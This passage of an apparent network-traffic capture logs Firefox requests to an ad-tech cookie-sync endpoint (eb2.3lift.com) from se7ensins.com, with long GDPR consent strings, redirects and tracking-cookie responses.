AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID

firefox.exe

Remote address:

76.223.111.18:443

Request

GET /sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID HTTP/2.0
host: eb2.3lift.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

date: Sun, 26 May 2024 02:06:48 GMT
content-length: 0
location: /sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID&ld=1
cache-control: no-cache, no-store, must-revalidate
set-cookie: tluidp=2721234785724860663707; Path=/; Domain=.3lift.com; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:06:48 GMT; Secure; SameSite=None; Partitioned;
p3p: policyref="http://cdn.3lift.com/w3c/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
set-cookie: tluid=2721234785724860663707; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:06:48 GMT; Path=/; Domain=.3lift.com; Secure; SameSite=None
GET

https://eb2.3lift.com/sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID&ld=1

firefox.exe

Remote address:

76.223.111.18:443

Request

GET /sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID&ld=1 HTTP/2.0
host: eb2.3lift.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:48 GMT
content-type: text/html; charset=utf-8
content-length: 0
cache-control: no-cache, no-store, must-revalidate
GET

https://eb2.3lift.com/sync?us_privacy=1---&

firefox.exe

Remote address:

76.223.111.18:443

Request

GET /sync?us_privacy=1---& HTTP/2.0
host: eb2.3lift.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

date: Sun, 26 May 2024 02:07:32 GMT
content-length: 0
location: /sync?us_privacy=1---&&ld=1
cache-control: no-cache, no-store, must-revalidate
set-cookie: tluidp=1925789768658560750983; Path=/; Domain=.3lift.com; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:07:32 GMT; Secure; SameSite=None; Partitioned;
p3p: policyref="http://cdn.3lift.com/w3c/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
set-cookie: tluid=1925789768658560750983; Max-Age=7776000; Expires=Sat, 24 Aug 2024 02:07:32 GMT; Path=/; Domain=.3lift.com; Secure; SameSite=None
GET

https://eb2.3lift.com/sync?us_privacy=1---&&ld=1

firefox.exe

Remote address:

76.223.111.18:443

Request

GET /sync?us_privacy=1---&&ld=1 HTTP/2.0
host: eb2.3lift.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers
